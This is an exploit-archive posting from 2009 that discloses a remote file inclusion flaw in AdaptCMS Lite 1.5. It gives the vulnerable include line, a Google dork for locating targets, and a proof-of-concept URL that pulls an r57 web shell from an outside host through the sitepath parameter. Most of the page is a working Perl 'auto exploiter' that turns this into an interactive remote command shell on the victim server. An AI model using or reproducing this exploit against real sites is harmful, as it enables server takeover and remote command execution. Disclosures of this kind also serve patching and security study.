[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
# Published : 2009-11-29
# Author : v3n0m
# Previous Title : Sugar CRM 5.5.0.RC2 and 5.2.0j Multiple Remote Vulnerabilities
# Next Title : Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability


)   )            )                     (   (         (   (    (       )     )  
  ( /(( /( (       ( /(  (       (    (     ) )) )      ) )) ) ) ) ( /(  ( /(  
  )())())) )    )()) )      )   )   (()/(()/(  (  (()/(()/((()/( )()) )()) 
 ((_)((_)(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )  /(_))(_))/(_))(_)|((_)  
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_) 
  / / _ (_)) __  / (_)_(_)(/ __(_)_(_) _ |   | __| _  |  |_ _|| | | |/ /  
  V / (_) || (_ | V / / _   | (__ / _  |   /| |) | _||   / |__ | | | .` | ' <   
  |_| ___/  ___| |_| /_/ _  ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_  


[+] AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
[-] Author	: v3n0m
[-] Contact	: v3n0m666[at]live[dot]com
[-] Blog	: http://v3n0m.blogdetik.com/
[-] Group	: YOGYACARDERLINK
[-] Site	: http://yogyacarderlink.web.id/
[-] Date	: November, 26-2009 [INDONESIA]

[!] Application	: AdaptCMS Lite
[!] Vendor	: www.insanevisions.com
[!] Version	: 1.5 Other versions may also be affected
[!] Download	: http://sourceforge.net/projects/adaptcms/files/
[!] License	: Free
[!] Vulnerable	: Remote File Inclusion
[!] Google Dork	: Copyright 2006-2009 Insane Visions


[o] Description

AdaptCMS is a PHP CMS that is made for complete control of your website, 
easiness of use and easily adaptable to any type of website. 
It's made easy with advanced custom fields, 
a very simple but powerful template system and much more.


Vuln Code & PoC
***************
Vuln: include_once($sitepath."includes/rss/simplepie.inc");

PoC : http://server/plugins/rss_importer_functions.php?sitepath=http://localhost/r57.txt??


AdaptCMS Lite Auto Exploiter
****************************

#!/usr/bin/perl -w

##################################################################
# Created by v3n0m                                               #
# sHoutz: lingah,IdioT_InsidE,LeQhi,aRiee,z0mb13,m4rco,NaZmy,    #
#	  eidelweiss,JaLi-,Anak_Naga_,g0nz,mywisdom,setanmuda,   #
#	  yoga0400,ripper_maya,elv1n4,badkiddies,dhit_coxon,     #
#	  psychotic_girl,jo8928,r4f43l_world,angela zhang        #
#	  & All YOGYACARDERLINK Crew                             #
#                                                                #
# - register_globals = on                                        #
# - allow_url_include = on                                       #
# - allow_url_fopen = on                                         #
##################################################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;

sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}

&clear();

sub banner {
        &clear();
	print "|---------------------------------------------|n";
	print "|       AdaptCMS Lite RFI Auto Injector       |n";
	print "| Created  : v3n0m                            |n";
	print "| E-mail   : v3n0m666[at]live[dot]com         |n";
	print "|                                             |n";
	print "|                                             |n";
	print "|                  www.yogyacarderlink.web.id |n";
	print "|---------------------------------------------|nn";
	print "Usage:n";
	print " perl $0 -u "http://target/[path]/" -fuck "http://localhost/r57.txt??"nn";
        exit();
}

my $options = GetOptions (
  'help!'            => $help, 
  'u=s'            => $u, 
  'fuck=s'            => $fuck
  );

&banner unless ($u);
&banner unless ($fuck);

chomp($u);
chomp($fuck);

while (){

	print "[shell]:~$ ";
	chomp($cmd=<STDIN>);

	if ($cmd eq "exit" || $cmd eq "quit") {
		exit 0;
	}

	my $ua = LWP::UserAgent->new;
        $iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
        chomp($iny);
        my $own = $u . "/plugins/rss_importer_functions.php?sitepath=" . $fuck . $iny;
        chomp($own);
	my $req = HTTP::Request->new(GET => $own);
	my $res = $ua->request($req);
	my $con = $res->content;
	if ($res->is_success){
		print $1,"n" if ( $con =~ m/readonly> (.*?)</textarea>/mosix);
	}
           else
             {
                print "Exploiting failed !!n";
                exit(1);
             }
}